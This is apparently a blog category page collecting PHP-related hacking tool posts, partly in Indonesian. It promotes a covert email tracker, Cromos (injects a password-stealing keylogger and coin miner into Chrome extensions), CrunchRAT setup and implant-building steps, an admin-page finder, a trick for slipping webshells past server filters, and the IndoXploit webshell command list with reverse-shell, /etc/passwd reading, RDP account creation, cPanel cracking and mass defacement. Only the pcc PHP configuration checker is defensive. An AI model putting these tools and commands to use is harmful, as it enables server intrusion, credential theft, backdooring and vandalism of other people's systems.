Termux ID: PHP -->

    Social Items

Home / PHP

IP-Biter is an open source, easy to deploy, tracking framework that generate high configurables and uniques tracking images and links to embed in e-mails, sites or chat systems and visualize, in an hacker-friendly dashboard, high detailed reports of the tracked users who visualize the image or open the links.

Features
  • Very high configurable tracking image generation
  • Tracking links generation
  • Tracking hided and not recognizable from the target point of view
  • Integrated Dashboard
  • Self-tracking prevention
  • Possibility to stop and start the tracking at any time
  • Possibility to hide the Dashboard and protect its access with a password
  • Live tracking reports from the Dashboard
  • Tracking reports live delivered to a configurable mail address
  • Different IP analysis services
  • User-Agent analysis service
  • Integrate URL shortening service
  • AllInOne PHP file
  • No need for a Database
  • Open Source
...and many many more!
Give it a try!

Getting Started

Access the Dashboard
  1. Access the dashboard through ipb.php?op=$dashboardPage (or through ipb.php if $dashboardPage=='')
    • If $dashboardPageSecret!='' then a login page will appear asking for the $dashboardPageSecret value

Create a new configuration
  1. When the dashboard is opened without parameters, a new configuration is created
    • Another empty new configuration can be generate clicking the "New" button
  2. Configure the tracking image and the advanced setting if needed
    • It is possible to left the original image url empty. In this case an empty image will be used.
  3. Add tracking links if needed
    • It is possible to left the original link empty. In this case the link will generate a 404 page.
  4. Save the configuration
  5. Distribute the generated image or the links to start the tracking
    • You can click the copy button and paste in a html rich email editor like gmail
    • NOTE: If you try to open the generated image or links but have in the same browser the dashboard page opened and loaded, your request will not be tracked (self-tracking prevention feature)

Load an existing configuration
  1. When the dashboard is opened with the parameter "uuid", the associated configuration is loaded
    • Another configuration can be loaded pasting the "Track UUID" in the dashboard relative field and clicking the "Load" button
  2. The reports will be automatically visualized in the "Tracking Reports" section of the dashboard

Security Notes
  • Change the folders name and the dashboard page in the configuration section in order to improve the security
  • Add the following lines to the .htaccess file in order to deny the access to the "configs" and "reports" folders:
DirectoryIndex ipb.php
<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteRule ^(configs/|reports/) - [F]
</IfModule>

Live DEMO
Have a look at the DEMO (notifications limited at 50 mail/day and 1h/day downtime expected)


IP-Biter - The Hacker-friendly E-Mail Tracking Framework


Cromos is a tool for downloading legitimate extensions of the Chrome Web Store and inject codes in the background of the application and more cromos create executable files to force installation via PowerShell for example, and also upload files to dropbox to host the malicious files.
  • Download extension
  • Injections
  • Upload files on dropbox
  • Windows infection

Group Policy Object (GPO)
Chrome allows you to add extensions using Windows Group Policy Object (GPO) if you need to force installation on multiple machines just follow the steps in the Chrome Deployment Guide then modify the original extension with few modifications you can publish your extension in the Chrome Web Store requires to pay $5.

Support
If you chose to generate a batch file to force installation the script in powershell that will be downloaded is compatible Windows, 7, 8 10 with versions of powershell >= 3.0

Demo
This is a demonstration of the tool at work in this examples I'm downloading a famous Google extension called G Suite Training on Google Chrome Web Store and injecting a keylogger module.

Installation
$ cd $HOME/
$ git clone https://github.com/fbctf/cromos
$ sudo chmod -R 777 cromos/
$ cd cromos && python setup.py

Usage

Downloading the extension
Usage: python cromos.py --extension {id}

Downloading the extension and loading module
Usage: python cromos.py --extension {id} --load {currency/keylogger}

Build a batch file and upload the files in dropbox
Usage: python cromos.py --extension {id} --build {bat} --token {dropboxToken}

Modules
You can also inject some predefined modules in the background as keylogger, virtual currency.
Module Description
modules/keylogger This module captures all the passwords you type in an infected browser over https or not. All you need is to have a php server for example to receive the requests get the parameters are email, password, cookies and userAgent.
modules/currency This module allows you to mine virtual coins using the coinhive API, you just need to have an account.


Cromos - Download and Inject code into Google Chrome extensions


Check current PHP configuration for potential security flaws.
Simply access this file from your webserver or run on CLI.

Author
This software was written by Ben Fuhrmannek, SektionEins GmbH, in an effort to automate php.ini checks and spend more time on cheerful tasks.

Idea
  • one single file for easy distribution
  • simple tests for each security related ini entry
  • a few other tests - not too complicated though
  • compatible with PHP >= 5.4, or if possible >= 5.0
  • NO complicated/overengineered code, e.g. no classes/interfaces, test-frameworks, libraries, ... -> It is supposed to be obvious on first glance - even for novices - how this tool works and what it does!
  • NO (or very few) dependencies

Usage / Installation
  • CLI: Simply call php phpconfigcheck.php. That's it. Add -a to see hidden results as well, -h for HTML output and -j for JSON output.
  • WEB: Copy this script to any directory accessible by your webserver, e.g. your document root. See also 'Safeguards' below.
    The output in non-CLI mode is HTML by default. This behaviour can be changed by setting the environment variable PCC_OUTPUT_TYPE=text or PCC_OUTPUT_TYPE=json.
    Some test cases are hidden by default, specifically skipped, ok and unknown/untested. To show all results, use phpconfigcheck.php?showall=1. This does not apply to JSON output, which returns all results by default.
    To control the output format in WEB mode use phpconfigcheck.php?format=..., where the value of format maybe one of text, html or json. For example: phpconfigcheck.php?format=text. The format parameter takes precedence over PCC_OUTPUT_TYPE.

Safeguards
Most of the time it is a good idea to keep security related issues such as your PHP configuration to yourself. The following safeguards have been implemented:
  • mtime check: This script stops working in non-CLI mode after two days. Re-arming the check can be done by touch phpconfigcheck.php or by copying the script to your server again (e.g. via SCP). This check can be disabled by setting the environment variable: PCC_DISABLE_MTIME=1, e.g. SetEnv PCC_DISABLE_MTIME 1 in apache's .htaccess.
  • source IP check: By default only localhost (127.0.0.1 and ::1) can access this script. Other hosts may be added by setting PCC_ALLOW_IP to a your IP address or a wildcard pattern, e.g. SetEnv PCC_ALLOW_IP 10.0.0.* in .htaccess. You may also choose to access your webserver via SSH Port forwarding, e.g. ssh -D or ssh -L.

Troubleshooting
  • disabled functions: This scripts needs a few functions to work properly, such as ini_get() and stat(). If one of these functions is blacklisted (or not whitelisted) then execution will fail or produce invalid output. In these cases it is possible to temporarily put Suhosin in simulation mode and omit disable_functions. To be on the safe side, relaxed security configuration can be done with .htaccess in a separate directory. Also, this script may be called from command line with your webserver's configuration, e.g. php -n -c /etc/.../php.ini phpconfigcheck.php.
  • CLI: Older PHP versions don't known about SAPI name 'cli' and use CGI style output even on cli. Workaround: PCC_OUTPUT_TYPE=text /opt/php/php-5.1.6/bin/php phpconfigcheck.php

WARNING
This tool will only support you setting up a secure PHP environment. Nothing else. Your setup, software or any related configuration may still be vulnerable, even if this tool's output suggests otherwise.


pcc - PHP Secure Configuration Checker


CrunchRAT currently supports the following features:
  • File upload
  • File download
  • Command execution
It is currently single-threaded (only one task at a time), but multi-threading (or multi-tasking) is currently in the works. Additional features will be included at a later date.

Server
The server-side of the RAT uses PHP and MySQL. The server-side of the RAT has been tested and works on the following:
  • Ubuntu 15.10 (Desktop or Server edition)
  • Ubuntu 16.04 (Desktop or Server edition)
Once the latest RAT code has been downloaded, there will be three directories:
  • Client - Contains implant code (ignore for the this section)
  • Server - Contains server code
  • Setup - Contains setup files

Dependencies Setup
  1. Within the Setup directory, there are two dependencies setup shell scripts. If you are using Ubuntu 15.10 run sh 15_10_dependencies.sh, and if you're using Ubuntu 16.04 run sh 16_04_dependencies.sh. Note: This needs to be run as root. Failure to run with root privileges will result in an error.
  2. When asked for a new MySQL root password, please choose one that is complex. This information is needed at a later step.

HTTPS Setup
  1. CrunchRAT uses a self-signed certificate to securely communicate between the server and implant. Run the https_setup.sh shell script with the Setup directory to automate the HTTPS setup. Note: This needs to be run as root. Failure to run with root privileges will result in an error. When asked to fill out the certificate information (Country Name, etc), please fill out all information. Snort rules already exist to alert on the dummy OpenSSL certificates. Don't be that guy that gets flagged by not filling out this information.

Database Setup
  1. Run the database_setup.sh shell script within the Setup directory to setup the MySQL database.
  2. CrunchRAT creates a default RAT account with the admin:changeme credentials. Please log into the web end of the RAT and change the default password. Once logged into the web end of the RAT, go to Account Management--> Change Password to successfully change the default password to something more complex. Additional RAT users can be provisioned using Account Management --> Add Users.

Miscellaneous Setup
  1. Copy all files from the Server directory to the webroot.
  2. You will want to create a downloads directory as well. Note: It is absolutely critical that you don't put this folder in the webroot. I typically create this directory in the /home/<USERNAME> directory. You will want to make sure that www-data can access this directory with the following command sudo chown www-data:www-data downloads. This directory will store all of the files downloaded from the infected system(s).
  3. In the webroot, open the config/config.php file. This is the main RAT configuration file. Make sure that you update all of the variables (downloadsPath, dbUser, dbPass, etc) to match your environment.

Client
CrunchRAT is written in C# for simplicity. The C# binary does not have a persistence mechanism in place, but plans to write a C++ stager are currently in the works.
Targeted Framework: .NET Framework 3.5 (enabled by default on Windows 7 systems)
  1. Create a new console project in Visual Studio
  2. Copy implant.cs code from Client directory and add it to the project.
  3. Change Output Type to Windows Application (this will hide the command window) (Project --> Properties --> Output Type).
  4. Make sure Target Framework is .NET Framework 3.5.
  5. In the actual code, there will be a variable called c2 - Change this variable to the IP address or domain name of the C2 server
  6. Compile and your implant executable is ready to run.


CrunchRAT - HTTPS-based Remote Administration Tool (RAT)


A script to find admin login pages and EAR vulnerabilites.

Features
  • Multi-threading on demand
  • Big path list (798 paths)
  • Supports php, asp and html extensions
  • Checks for potential EAR vulnerabilites
  • Checks for robots.txt
  • Support for custom patns

Usages
  • Check all paths with php extension
python breacher -u example.com --type php
  • Check all paths with php extension with threads
python breacher -u example.com --type php --fast
  • Check all paths without threads
python breacher -u example.com
  • Adding a custom path
python breacher -u example.com --path /data

 Note: When you specify an extension using --type option, Breacher includes paths of that extension as well as paths with no extensions like /admin/login


Breacher - Tool To Find Admin Login Pages And EAR Vulnerabilites

 Xampp

kali ini gue mau sedikit jelasin nih tentang xampp :'v nah berhubung w gk ada imajinasi buat bikin tutor ya udah w post beginian aja :'v mayan nambah ilmu
sedikit penjelasan tentang xampp
Xampp adalah perangkat yang menggabungkan tiga aplikasi kedalam satu paket,yaitu Apache,MySQL,dan PHPMyAdmin,Dengan Xampp pekerjaan anda sangat dimudahkan karena dapat menginstalasi dan mengkonfigurasi ketiga aplikasi tersebut dengan sekaligus dan otomatis.
xampp juga bisa buat localhost :'v ya buat ngetes shell atau explot baru yang ber ekstensi php :'v 















Tertarik ?  Bisa Download dibawah :'v

Download gan


Xampp Aplikasi Localhost untuk Linux atau Windows

Oke kali ini gua pengen share sedikit trik, bagaimana membypass sebuah server yang 'bikin jengkel' waktu upload shell-shell besar seperti (indoxploit shell, wso, b374k, c99, dll). Yap Not Acceptable.

Mudah saja untuk mengakalinya.
Write sebuah file backdoor ke dalam directory /tmp, lalu panggil shell itu melalui current directorynya dengan sebuah PHP Function 'include()'
Penjelasan lebih lanjut.

Disini, saya sudah membuat backdoor khusus agar lebih mudah memanggil backdoor lain yang kita inginkan.

Source: https://pastebin.com/z8WiCv3S

Ubah bagian $URL, isilah dengan URL Shell Backdoor yang kalian inginkan.

Langsung saja buka file backdoornya.
 Jika backdoor TMP Shell terus-menerus redirect & menghasilkan blank page. Itu tandanya file backdoor yang dipanggil tidak berhasil di Write pada directory /tmp.
Oke sekian dulu.
Semoga Bermanfaat.

Bypass 406 & Auto Delete Shell Oleh Server Dengan TMP Shell by IndoXploit

Haloo, selamat malammm.
Kali ini kita akan share lagi shell backdoor indoxploit. Kali ini kami tambah beberapa fitur-fitur baru yang sebelumnya tidak ada di indoxploit shell, tentu serta beberapa perubahan bentuk shell dan lainnya. Oke Langsung saja disimak.

IndoXploit Shell V.3 menggunakan 'Command Based' atau bisa dibilang untuk menjalankan beberapa tools/fiturnya, kalian harus memasukan command tertentu.

Contoh command untuk memanggil tools 'Adminer'


Login Shell, default password: IndoXploit

 [ List Tools - IndoXploit Shell Backdoor V.3 ]

=============================================
**** COMMAND BASED *****
 - Read File
 usage: rf [filename]
 example: rf /etc/passwd

 - Spawn File/Tools 
 usage: spawn [name]

 [name]
- Adminer (adminer)
 - WebConsole (webconsole)
 - CGI Telnet 1 (cgitelnet1)
 - CGI Telnet 2 (cgitelnet2)
 - PHPINFO (phpinfo)

 example:
 spawn adminer
 spawn webconsole
 spawn cgitelnet1

Jumping
usage: jumping

Config Grabber
usage: idxconfig

 - Symlink 
 usage: symlink

 - Reverse Shell 
 [Back Connect]
 usage: rvr bc [IP] [PORT] [TYPE]
 example:
 rvr bc 127.0.0.1 1337 bash
 rvr bc 127.0.0.1 1337 perl

 [Bind Port]
 usage: rvr bp [PORT] [TYPE]
 example:
 rvr bp 1337 perl

 - KRDP - Create RDP Account (for windows server only) 
 usage: krdp

 - Logout From Shell
usage: logout

 - Kill Backdoor 
usage: killme
=============================================
- Mass Password Change
- Fake Root
- Cpanel Crack
- Mass Deface/Delete File
- Zone-H Mass Submit



#Link Download: 
http://server.indoxploit.or.id/indoxploit_v3.txt

###############################################################################
Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.

Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
Tanpa kalian kita tidak akan BESAR seperti sekarang.

Greetz: 
All Member IndoXploit. & All My Friends.
###############################################################################
Special Thanks: 
Depok Cyber Security | Sanjungan Jiwa | 0x1999
###############################################################################

IndoXploit Shell First Edition [ V.3 ]

Subscribe to: Posts (Atom)